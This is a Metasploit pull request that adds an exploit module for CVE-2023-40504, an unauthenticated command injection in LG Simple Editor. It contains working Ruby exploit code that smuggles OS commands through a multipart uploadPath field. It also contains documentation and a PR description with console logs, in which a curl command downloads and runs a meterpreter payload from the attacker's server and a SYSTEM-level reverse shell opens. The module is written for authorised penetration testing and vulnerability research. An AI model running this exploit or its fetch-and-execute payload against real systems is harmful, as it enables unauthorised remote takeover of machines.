### PR TITLE
LG Simple Editor Command Injection (CVE-2023-40504) Module

### DIFF
--- a/documentation/modules/exploit/windows/http/lg_simple_editor_rce_uploadvideo.md
+++ b/documentation/modules/exploit/windows/http/lg_simple_editor_rce_uploadvideo.md
@@ -1,0 +1,67 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in LG Simple Editor <= v3.21.0 (CVE-2023-40504).
+
+An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of
+`NT AUTHORITY\SYSTEM`.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://www.lg.com/us/business/display-solutions/supersign-w-lite/downloads/LGSimpleEditor_setup_v3_21_0.exe.zip).
+The vulnerable application runs on Apache Tomcat 7, which listens by default on TCP port 8080.
+
+**Successfully tested on**
+
+- LG Simple Editor v3.21.0 on Windows 10 22H2
+
+## Verification Steps
+
+1. Install the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 exploit(windows/http/lg_simple_editor_rce_uploadvideo) > use exploit/windows/http/lg_simple_editor_rce_uploadvideo 
+[*] Using configured payload cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/lg_simple_editor_rce_uploadvideo) > set RHOSTS <IP>
+msf6 exploit(windows/http/lg_simple_editor_rce_uploadvideo) > exploit
+```
+
+You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`.
+
+## Scenarios
+
+Running the exploit against LG Simple Editor v3.21.0 on Windows 10 22H2, using curl as a fetch command, should result in an output similar
+to the following:
+
+```
+msf6 exploit(windows/http/lg_simple_editor_rce_uploadvideo) > exploit 
+
+[*] Command to run on remote host: curl -so %TEMP%\ELizAMEog.exe http://192.168.137.190:8080/Ufbk8y1KXtCzmtyya8K7Jg & start /B
+%TEMP%\ELizAMEog.exe
+[*] Fetch handler listening on 192.168.137.190:8080
+[*] HTTP server started
+[*] Adding resource /Ufbk8y1KXtCzmtyya8K7Jg
+[*] Started reverse TCP handler on 192.168.137.190:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version: 3.21.0
+[*] Sending command injection...
+[*] Using random filename: JyQig.mp4
+[*] Client 192.168.137.196 requested /Ufbk8y1KXtCzmtyya8K7Jg
+[*] Sending payload to 192.168.137.196 (curl/8.7.1)
+[*] Sending stage (201798 bytes) to 192.168.137.196
+[+] Command injection sent.
+[*] Exploit finished, check thy shell.
+[*] Meterpreter session 67 opened (192.168.137.190:4444 -> 192.168.137.196:50129) at 2024-08-06 23:16:30 -0400
+
+meterpreter > sysinfo 
+Computer        : DESKTOP-1FD5QG3
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```

--- a/modules/exploits/windows/http/lg_simple_editor_rce_uploadvideo.rb
+++ b/modules/exploits/windows/http/lg_simple_editor_rce_uploadvideo.rb
@@ -50,7 +50,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RPORT(8080)
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/'])
       ]
     )
   end

--- a/modules/exploits/windows/http/lg_simple_editor_rce_uploadvideo.rb
+++ b/modules/exploits/windows/http/lg_simple_editor_rce_uploadvideo.rb
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Using random filename: #{filename}.mp4")
     form = Rex::MIME::Message.new
     form.add_part('/', nil, nil, "form-data; name=\"uploadVideo\"; filename=\"#{filename}.mp4\"")
-    form.add_part("/\"&#{cmd}&calc&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del #{filename}.mp4&/../", nil, nil, 'form-data; name="uploadPath"')
+    form.add_part("/\"&#{cmd}&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del #{filename}.mp4&/../", nil, nil, 'form-data; name="uploadPath"')
     form.add_part('1', nil, nil, 'form-data; name="uploadFile_x"')
     form.add_part('1', nil, nil, 'form-data; name="uploadFile_width"')
     form.add_part('1', nil, nil, 'form-data; name="uploadFile_height"')

--- a/modules/exploits/windows/http/lg_simple_editor_rce_uploadvideo.rb
+++ b/modules/exploits/windows/http/lg_simple_editor_rce_uploadvideo.rb
@@ -1,0 +1,113 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'LG Simple Editor Command Injection (CVE-2023-40504)',
+        'Description' => %q{
+          Unauthenticated Command Injection in LG Simple Editor <= v3.21.0.
+          The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'rgod', # Vulnerability discovery
+          'Michael Heinzl' # MSF module
+        ],
+        'References' => [
+          [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-1208/'],
+          [ 'CVE', '2023-40504']
+        ],
+        'DisclosureDate' => '2023-08-04',
+        'Platform' => 'win',
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Windows_Fetch',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => 'win',
+              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },
+              'Type' => :win_fetch,
+              'Payload' => {
+                'BadChars' => '\\'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8080)
+      ]
+    )
+  end
+
+  # Determine if the Simple Editor instance runs a vulnerable version
+  # copied from lg_simple_editor_rce.rb
+  def check
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do')
+      }
+    )
+
+    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+
+    version = Rex::Version.new(res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', ''))
+    return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'
+    return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0')
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(cmd)
+    print_status('Sending command injection...')
+    exec_simplerce(cmd)
+    print_status('Exploit finished, check thy shell.')
+  end
+
+  # Send command injection
+  def exec_simplerce(cmd)
+    filename = Rex::Text.rand_text_alpha(1..6)
+    vprint_status("Using random filename: #{filename}.mp4")
+    form = Rex::MIME::Message.new
+    form.add_part('/', nil, nil, "form-data; name=\"uploadVideo\"; filename=\"#{filename}.mp4\"")
+    form.add_part("/\"&#{cmd}&calc&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del #{filename}.mp4&/../", nil, nil, 'form-data; name="uploadPath"')
+    form.add_part('1', nil, nil, 'form-data; name="uploadFile_x"')
+    form.add_part('1', nil, nil, 'form-data; name="uploadFile_width"')
+    form.add_part('1', nil, nil, 'form-data; name="uploadFile_height"')
+
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadVideo.do'),
+        'ctype' => "multipart/form-data; boundary=#{form.bound}",
+        'data' => form.to_s
+      }
+    )
+    if res && res.code == 200
+      print_good 'Command injection sent.'
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer}: Unexpected response received.")
+    end
+  end
+
+end


### PR DESCRIPTION
This is a new module which exploits an unauthenticated command injection vulnerability in LG Simple Editor <= v3.21.0 (CVE-2023-40504). 

Successful exploitation allows to inject arbitrary OS commands which will get executed in the context of `NT AUTHORITY\SYSTEM`.

## Verification Steps

1. Install the application from the [vendor](https://www.lg.com/us/business/display-solutions/supersign-w-lite/downloads/LGSimpleEditor_setup_v3_21_0.exe.zip).
2. Start `msfconsole` and enter the following commands:
- `use exploit/windows/http/lg_simple_editor_rce_uploadvideo`
- `set RHOSTS <IP>`
- `exploit`

This should result in a meterpreter session:
```
msf6 exploit(windows/http/lg_simple_editor_rce_uploadvideo) > exploit 

[*] Command to run on remote host: curl -so %TEMP%\ELizAMEog.exe http://192.168.137.190:8080/Ufbk8y1KXtCzmtyya8K7Jg & start /B
%TEMP%\ELizAMEog.exe
[*] Fetch handler listening on 192.168.137.190:8080
[*] HTTP server started
[*] Adding resource /Ufbk8y1KXtCzmtyya8K7Jg
[*] Started reverse TCP handler on 192.168.137.190:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 3.21.0
[*] Sending command injection...
[*] Using random filename: JyQig.mp4
[*] Client 192.168.137.196 requested /Ufbk8y1KXtCzmtyya8K7Jg
[*] Sending payload to 192.168.137.196 (curl/8.7.1)
[*] Sending stage (201798 bytes) to 192.168.137.196
[+] Command injection sent.
[*] Exploit finished, check thy shell.
[*] Meterpreter session 67 opened (192.168.137.190:4444 -> 192.168.137.196:50129) at 2024-08-06 23:16:30 -0400

meterpreter > sysinfo 
Computer        : DESKTOP-1FD5QG3
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

**Successfully tested on**

Tested in the following deployment, with both the `curl` and `certutil` fetch commands.
- LG Simple Editor v3.21.0 on Windows 10 22H2

## Notes
There is an existing module for LG Simple Editor v3.21.0 [here](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/lg_simple_editor_rce.rb) that also obtains RCE. This is done through CVE-2023-40498, by abusing a path traversal issue in the endpoint `/simpleeditor/fileSystem/makeDetailContent.do`, where a previously uploaded JSP shell (via `/simpleeditor/imageManager/uploadImage.do`) is being used.

This module exploits instead CVE-2023-40504 through the endpoint `/simpleeditor/imageManager/uploadVideo.do`, by injecting an arbitrary OS command when `C:\LG Simple Editor\bin\tools\mpeg\MediaInfo.exe` is invoked in the backend on the uploaded video file, to fetch remotely a (meterpreter) payload.